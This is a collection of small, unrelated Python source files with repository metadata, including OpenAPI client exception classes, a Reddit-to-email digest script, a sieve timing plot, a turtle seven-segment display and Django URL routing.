3d07439a0606060f4f49825121ce14c2c92590b0 | e6c506beafef296be2f60c3809b36c96c7374224 | /左旋转字符串.py | 87a697603b995532a2bcc0e42f07e4a2dc49236e | [] | no_license | Liubasara/pratice_code | d435c982379e377e3cb657d77e207f4f51f5e3b5 | 353363780b0918802e9457aee8ec2a8acc0c24fb | refs/heads/master | 2023-08-18T01:29:00.676510 | 2023-08-10T11:09:11 | 2023-08-10T11:09:11 | 137,707,904 | 0 | 0 | null | 2023-01-08T07:34:21 | 2018-06-18T03:54:33 | JavaScript | UTF-8 | Python | false | false | 72 | py |
if __name__ == "__main__":
a = [1,2,3,4,5,6]
print a[1:]+a[:1] | [
"followsin@gami.com"
] | followsin@gami.com |
fefa024de214cfeafa5d85b6923b4b92572e46fb | 583c92b827d741f2385560a75de6d125d888be1b | /classics_proxy_client/exceptions.py | 210bd4cd7815f0f358d47f53315b996b6d4cc04d | [] | no_license | kyunghyuncho/classics-proxy-client | 9686e72aae830bfe8072648505419ddc5c18df5a | 5bfaf30106ba5456a5c2787f0cf8a1cacff10a00 | refs/heads/master | 2022-07-01T05:08:22.608264 | 2020-05-11T04:30:45 | 2020-05-11T04:30:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,761 | py | # coding: utf-8
"""
Classics Proxy API
Proxy API for fetching Classic Sino-Korean Literature from various corpora # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import six
class OpenApiException(Exception):
"""The base exception class for all OpenAPIExceptions"""
class ApiTypeError(OpenApiException, TypeError):
def __init__(self, msg, path_to_item=None, valid_classes=None,
key_type=None):
""" Raises an exception for TypeErrors
Args:
msg (str): the exception message
Keyword Args:
path_to_item (list): a list of keys an indices to get to the
current_item
None if unset
valid_classes (tuple): the primitive classes that current item
should be an instance of
None if unset
key_type (bool): False if our value is a value in a dict
True if it is a key in a dict
False if our item is an item in a list
None if unset
"""
self.path_to_item = path_to_item
self.valid_classes = valid_classes
self.key_type = key_type
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiTypeError, self).__init__(full_msg)
class ApiValueError(OpenApiException, ValueError):
def __init__(self, msg, path_to_item=None):
"""
Args:
msg (str): the exception message
Keyword Args:
path_to_item (list) the path to the exception in the
received_data dict. None if unset
"""
self.path_to_item = path_to_item
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiValueError, self).__init__(full_msg)
class ApiKeyError(OpenApiException, KeyError):
def __init__(self, msg, path_to_item=None):
"""
Args:
msg (str): the exception message
Keyword Args:
path_to_item (None/list) the path to the exception in the
received_data dict
"""
self.path_to_item = path_to_item
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiKeyError, self).__init__(full_msg)
class ApiException(OpenApiException):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
def render_path(path_to_item):
"""Returns a string representation of a path"""
result = ""
for pth in path_to_item:
if isinstance(pth, six.integer_types):
result += "[{0}]".format(pth)
else:
result += "['{0}']".format(pth)
return result
| [
"iyi@snapchat.com"
] | iyi@snapchat.com |
cafc4911927a1bc3db70b0421caa2bd1947264dc | 5928d9dcf1ff48f5c9d1a491fd170886d4af4b9e | /walltime1s/time_diff.py | 2d35bd10713fac06055fb9354a1c9da5a913e757 | [] | no_license | xyongcn/qemu-tprof | 1ad76dd166eea692487153359c1d61a237eeb42c | 7c30f139e2d662d2bbc6d3a0925053b194f4e3bc | refs/heads/master | 2016-09-05T21:15:59.188610 | 2014-12-15T07:58:06 | 2014-12-15T07:58:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | #!/usr/bin/python
import sys
log=sys.stdin
def get_tusec(p_line):
words=line.split(":")
words2=words[1].split(",")
sec=words2[0].strip()
usec=words2[1].strip()
tusec=int(sec)*1000000+int(usec)
return tusec
line=log.readline()
t1=get_tusec(line)
while True:
line=log.readline()
if not line : break
t2=get_tusec(line)
#print str(t2)+","+str(t1)+","+str(t2-t1)
print (t2-t1-1000000)/1000.0
t1=t2
| [
"myming@ubuntu-xyong.(none)"
] | myming@ubuntu-xyong.(none) |
cc4ca8bee5f7c9548c5afea6850d0cc031ab24e8 | 4cd5d0ed28ae52277ba904ea70eb9ac234eced0c | /RedditDigest.py | 7072fd945ea5716f6272005fe9da061b6df0fb76 | [] | no_license | LiamHz/AutoPy | b30f672c69fb96e501d3434b28f6dd224546c39f | 9be71fea5e33a8cb715d407d91ea1eced177eca0 | refs/heads/master | 2021-07-08T12:47:02.485285 | 2019-03-06T16:47:37 | 2019-03-06T16:47:37 | 142,188,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | # Send the top posts of the past day from selected subreddits
import praw
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Read user credentials from external file
f = open("AuthenticationCredentials.txt","r")
lines = f.read().splitlines()
EMAIL_USERNAME = lines[1]
EMAIL_PASSWORD = lines[2]
REDDIT_USERNAME = lines[5]
REDDIT_PASSWORD = lines[6]
API_USERNAME = lines[9]
API_PASSWORD = lines[10]
f.close()
submissions = []
reddit = praw.Reddit(client_id=API_USERNAME,
client_secret=API_PASSWORD,
password=REDDIT_PASSWORD,
username=REDDIT_USERNAME,
user_agent='RedditDigest')
# How many posts to send from each subreddit
subredditLimit = 2
# Selected subreddits
subreddits = ['MachineLearning', 'WorldNews', 'Technology', 'Science', 'TodayILearned']
# 'Pics', 'MostBeautiful', 'EarthPorn']
for SR in subreddits:
count = 1
subreddit = reddit.subreddit(SR)
submissions.append(("<h2>{}</h2> \n").format(SR))
for submission in subreddit.top(time_filter='day', limit=subredditLimit):
submissions.append("<div> \n")
submissions.append(("<a href='{}'> \n").format(submission.url))
submissions.append(("<p>{}</p> \n").format(submission.title))
submissions.append("</a> \n")
submissions.append("</div> \n")
submissions.append("<br class='mobile'> \n")
submissions.append("<br> \n")
# Email results to self
fromaddr = EMAIL_USERNAME
toaddr = EMAIL_USERNAME
# Create message container
msg = MIMEMultipart('alternative')
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Reddit Digest"
# Plain text version of email
s = ''
formatted_submissions = s.join(submissions)
# HTML version of email
html = """\
<html>
<head>
<style>
@media only screen and (min-width:800px) {{
.mobile {{display: none !important;}}
}}
</style>
</head>
<body>
{}
</body>
</html>
""".format(formatted_submissions)
# Allow Unicode characters to be emailed
plainText = MIMEText(formatted_submissions.encode('utf-8'), 'plain', 'UTF-8')
html = MIMEText(html, 'html')
msg.attach(plainText)
msg.attach(html)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, EMAIL_PASSWORD)
server.sendmail(fromaddr, toaddr, msg.as_string())
server.quit()
| [
"liam.hinzman@gmail.com"
] | liam.hinzman@gmail.com |
31affbaa13b3b6dbe80804986e0fff5b1236c8cd | 63e903bd5448de49d666d00ae1cef76ba7e41b93 | /venv/Scripts/pip3.8-script.py | 986a0efffcb314557212eb151bb063f4e90a870c | [] | no_license | North-Poplar/untitled1 | 0958c01dfa92700876fd6a97a206cbd6c52175a2 | 06b1b025a7a2f66ce1d81a9e4ec1e164259cdb3a | refs/heads/master | 2022-11-11T18:21:33.833494 | 2020-07-04T14:55:54 | 2020-07-04T14:55:54 | 277,105,098 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\18505\PycharmProjects\untitled1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"2481253805@qq.com"
] | 2481253805@qq.com |
7cc1e02baa1ff8a47e4b543d8df9d4f42f3110fc | 2ea2631c1c7fd49d5c177f4b804b8470bdd62a82 | /sievePlot.py | 707c12b294296830c2404c227e276f6c54faeee4 | [] | no_license | Shichimenchou/CS4700FinalProject | abf733e83ee248eff98bb8ca6bc1d0d6a8e772fa | b80480bae028c714b5c8f812e2aa587c3f1092e4 | refs/heads/master | 2022-04-23T20:29:59.202388 | 2020-04-28T05:34:10 | 2020-04-28T05:34:10 | 259,216,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from pylab import *
t = arange(10, 31)
cpp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 2, 4, 9, 20, 41, 83, 173]
julia = [0.000038, 0.000065, 0.00012, 0.00027, 0.00058, 0.0011, 0.0021, 0.0048, 0.0084, 0.018, 0.041, 0.094, 0.21, 0.61, 1.03, 2.05, 4.21, 9.77, 26.62, 76.77, 379.12]
python = [0.00025, 0.00058, 0.0010, 0.0021, 0.0046, 0.009, 0.018, 0.038, 0.076, 0.16, 0.35, 0.76, 1.58, 3.44, 6.90, 14.43, 29.38, 59.28, 121.00, 266.12, 559.05]
print(len(cpp))
print(len(julia))
print(len(python))
plot(t, cpp, label="C++")
plot(t, julia, label="Julia")
plot(t, python, label="Python")
legend()
xlabel("Order (2^x)")
ylabel("Time (s)")
title("Sieve of Eratosthenes")
grid(True)
legend()
show()
| [
"linsonphillip@yahoo.com"
] | linsonphillip@yahoo.com |
3586db050a69dcf9aa2c251478a20d1daa1a8560 | 7eed53aaefbac57b374b31946ea2b26ff55e0e44 | /scripts/poc-7segment.py | d165774207b3d24e307b319de89e547f22bcc962 | [] | no_license | Nickardson/tracy-the-turtle-projects | 580b268a7ab3b9abc47c343a1e7cf4462ffc746b | 0545c2cd42b6a22544794b207ac2bc51475268da | refs/heads/master | 2022-12-12T07:54:19.942076 | 2020-03-06T01:01:56 | 2020-03-06T01:01:56 | 237,668,470 | 0 | 0 | null | 2022-12-11T22:53:59 | 2020-02-01T19:45:42 | Python | UTF-8 | Python | false | false | 2,182 | py | from turtle import Screen, Turtle
screen = Screen()
screen.setup(950, 200)
screen.register_shape('segment', ((-14.5, 0), (-12, 2.5), (12, 2.5), (14.5, 0), (12, -2.5), (-12, -2.5))) # <=>
SCALE = 1.75 # arbitrarily scale digits larger or smaller
CURSOR_SIZE = 25 # maximum dimension of our custom turtle cursor
SPACING = CURSOR_SIZE * 1.25 * SCALE # space from start of one digit to the next
DIGITS = { # which segments to turn on encoded as bits
'0': 0b1111110,
'1': 0b0110000,
'2': 0b1101101,
'3': 0b1111001,
'4': 0b0110011,
'5': 0b1011011,
'6': 0b1011111,
'7': 0b1110000,
'8': 0b1111111,
'9': 0b1111011,
'A': 0b1110111,
'B': 0b0011111,
'C': 0b1001110,
'D': 0b0111101,
'E': 0b1001111,
'F': 0b1000111,
}
def display_number(turtle, number):
for digit in str(number):
bits = DIGITS[digit]
for bit in range(7):
if 2 ** bit & bits:
position = turtle.position()
segments[bit](turtle)
turtle.stamp()
turtle.setheading(0)
turtle.setposition(position)
turtle.forward(SPACING)
def segment_A(turtle): # top
turtle.setheading(90)
turtle.sety(turtle.ycor() + 20 * SCALE)
def segment_B(turtle): # right upper
turtle.setposition(turtle.xcor() + 10 * SCALE, turtle.ycor() + 10 * SCALE)
def segment_C(turtle): # right lower
turtle.setposition(turtle.xcor() + 10 * SCALE, turtle.ycor() - 10 * SCALE)
def segment_D(turtle): # bottom
turtle.setheading(90)
turtle.sety(turtle.ycor() - 20 * SCALE)
def segment_E(turtle): # left lower
turtle.setposition(turtle.xcor() - 10 * SCALE, turtle.ycor() - 10 * SCALE)
def segment_F(turtle): # left upper
turtle.setposition(turtle.xcor() - 10 * SCALE, turtle.ycor() + 10 * SCALE)
def segment_G(turtle): # center
turtle.setheading(90)
segments = [segment_G, segment_F, segment_E, segment_D, segment_C, segment_B, segment_A]
digits = Turtle('segment', False)
digits.speed('fastest')
digits.shape('segment')
digits.penup()
digits.setx(SPACING - screen.window_width() / 2)
display_number(digits, "0123456789ABCDEF")
| [
"taylorgratzer@yahoo.com"
] | taylorgratzer@yahoo.com |
54efaf34fa4aca4b31c9b4fe6d36b5dd4d65d9f7 | 14e6cf117d502517805639ee5850ec4a78654765 | /backend/bestdeal/urls.py | e0372b2dacb48c1dced46fd457e18a6f81846225 | [] | no_license | viikt0r/pythonproject | cf05590b20798bbc12985f30eabf2970d262a5d1 | e7d9f49fdf206f297641fada0a861f1e307cd4b3 | refs/heads/master | 2023-01-06T00:43:27.587484 | 2019-06-05T17:16:19 | 2019-06-05T17:16:19 | 157,125,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from os import listdir
from os.path import join, isdir
from django.urls import path, include
from pythonproject.settings import BASE_DIR
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Bestdeal API')
API_DIR = 'bestdeal/api/'
entities = [directory
for directory in listdir(join(BASE_DIR, API_DIR))
if (isdir(join(BASE_DIR, API_DIR, directory))
and directory != '__pycache__')]
urlpatterns = [
path('', include('bestdeal.api.{}.urls'.format(entity)))
for entity in entities
]
urlpatterns += [
path('docs/', schema_view),
] | [
"esteve.viktor@gmail.com"
] | esteve.viktor@gmail.com |
2c535cfcb097e6b1a7f0880f3a022b2d331efe16 | b6c6d71b2c0c00540a6387ddd1e27db096d2f442 | /AIlab/certainty_facor.py | 85096f6a6ca860f1b181765f697481ee593bca29 | [] | no_license | raghavdasila/General-programs | 26bb5daddd054f8e6d56924ecb87884e687c8a53 | a9f2899ad2b048291793bbdf3dac808b571f9f13 | refs/heads/master | 2021-07-07T05:30:52.374798 | 2017-10-05T04:40:17 | 2017-10-05T04:40:17 | 104,132,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | if __name__=="__main__":
print "Medicine Accuracy Testing (Enter percentages)"
print "Enter sensitivity"
se=float(raw_input())/100.0
print "Enter Specificity"
sp=float(raw_input())/100.0
print "Enter percentage of users"
up=float(raw_input())/100.0
print "Enter population"
p=float(raw_input())
pv=(se*up)/(se*up+(1.0-up)*(1.0-se))
nv=(sp*up)/(sp*up+(1.0-up)*(1.0-sp))
n_users=up*p
users=p-n_users
cf1=int(pv*p)
cf2=int(nv*p)
print "Positive's certainty factor, people:",pv,cf1
print "Negative's certainty factor, people:",nv,cf2
print "Medicine suitable for people?"
if pv<.7 or nv<.7:print "NO"
else:print "YES"
| [
"noreply@github.com"
] | noreply@github.com |
a5b48a72bcda4d1aa680865c3ef883043afe3f26 | ff01890e8c6090cd7519da93a96d96a11235ec94 | /utils/flow_resolver/protocol.py | 74c97372118610e128a1103c7b503297c8b19ec5 | [
"Apache-2.0"
] | permissive | DeckerCHAN/shadowsocks | 707fbd19448919462bf9249c0e8feb557b9db1dc | 29afedb748b0ca2051def24b3bed430f522b4adf | refs/heads/master | 2021-01-15T21:30:02.355942 | 2015-05-09T05:09:49 | 2015-05-09T05:09:49 | 32,707,288 | 0 | 0 | null | 2015-03-23T02:38:19 | 2015-03-23T02:38:19 | null | UTF-8 | Python | false | false | 100 | py | __author__ = 'Decker'
class ProtocolType:
TCP = 1,
UDP = 2,
HTTP = 3,
UNKNOWN = -1 | [
"DeckerCHAN@gmail.com"
] | DeckerCHAN@gmail.com |
92e7d30756b64afbf77cb481a3bf486bdcc1f546 | c02f0785a36f970e72239acb73a8ed14e580d2c9 | /interview/interview_preparation_kit/warmup/challenges/sock_merchant/sock_merchant.py | df985956bfa5a017e5801d5c4107f8a8a06efe26 | [] | no_license | Nyakama/hacker_rank | f6fca0fea20a583e6c0e4b11d3e46c0c11c7e051 | fe611c1f9bde7233d5c1e4d9b3e58594193434ea | refs/heads/master | 2022-12-13T09:17:24.093312 | 2020-08-29T00:03:57 | 2020-08-29T00:03:57 | 290,355,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
sum=0
for val in Counter(ar).values():
sum+=val//2
return sum
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
ar = list(map(int, input().rstrip().split()))
result = sockMerchant(n, ar)
fptr.write(str(result) + '\n')
fptr.close()
| [
"lungile.nyakama@gmail.com"
] | lungile.nyakama@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.